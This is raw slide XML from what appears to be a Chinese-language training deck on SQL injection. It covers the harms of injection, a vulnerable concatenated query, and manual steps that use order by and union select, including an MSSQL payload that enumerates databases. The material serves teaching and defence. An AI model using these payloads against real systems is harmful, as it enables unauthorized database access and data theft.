            <a:ext cx="1809344"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数量众多</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>危害巨大</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173099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
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1838187" y="416407"/>
            <a:ext cx="8911976" cy="2400657"/>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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>注入危害</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>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b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>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“脱裤” ：获取目标服务器所有数据库信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>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获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>webshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>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获取系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1591879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
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1896555" y="390765"/>
            <a:ext cx="8911976" cy="461665"/>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kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>注入案列</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1838187" y="1522318"/>
            <a:ext cx="3209524" cy="952381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1976647" y="2753915"/>
            <a:ext cx="5068207" cy="1822851"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1976647" y="4770783"/>
            <a:ext cx="8986425" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>执行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语句：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>select name from student where number=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用户输入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>没有对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>值进行参数化，也没有进行过滤操作，直接拼接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语句，存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入风险。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1149404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
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1838187" y="1038978"/>
            <a:ext cx="8911976" cy="646331"/>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sz="1800" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1944843" y="1229420"/>
            <a:ext cx="5685714" cy="1895238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="图片 14"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1944843" y="2948845"/>
            <a:ext cx="5228571" cy="1819048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1944843" y="4582754"/>
            <a:ext cx="5438095" cy="1666667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8221648" y="2371599"/>
            <a:ext cx="3228230" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>这看起来似乎也没有什么呀？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1896555" y="390765"/>
            <a:ext cx="8911976" cy="461665"/>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kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>注入案列</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="http://wx2.sinaimg.cn/mw690/69c76a90ly1fbpapzm4bgj20hs0hsjsx.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0110" y="2948845"/>
            <a:ext cx="2851305" cy="2851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431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
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1838186" y="390765"/>
            <a:ext cx="8911976" cy="738664"/>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latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>手工注入步骤</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"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sz="1800" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1576053" y="1424095"/>
            <a:ext cx="9436243" cy="764498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3925108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731532" y="253140"/>
            <a:ext cx="8911976" cy="1846659"/>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latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>判断可显字段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"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利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>order by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>关键字</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sz="1800" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1731532" y="1433973"/>
            <a:ext cx="5704762" cy="2314286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1731532" y="3440428"/>
            <a:ext cx="4914286" cy="2085714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1001189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731532" y="345751"/>
            <a:ext cx="8911976" cy="1569660"/>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latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>爆库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>union  select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>语句</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sz="1800" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1617232" y="1687345"/>
            <a:ext cx="5628571" cy="2057143"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="图片 14"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="873331" y="3848212"/>
            <a:ext cx="10899569" cy="1790476"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3113285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731531" y="345123"/>
            <a:ext cx="8911976" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>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zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>爆库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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获取数据库中所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>Databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>数量：</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en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>2'+union+select+cast((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>SELECT+count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>(Name)+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>FROM+Master</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>SysDatabases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>as+varchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>(10))--</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sz="1800" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1416091" y="1981340"/>
            <a:ext cx="9542857" cy="2247619"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6716241" y="1981340"/>
            <a:ext cx="3533333" cy="4304762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="556372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664857" y="349287"/>
            <a:ext cx="8911976" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>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zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>爆库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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获取数据库中所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>Databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>名：</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en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
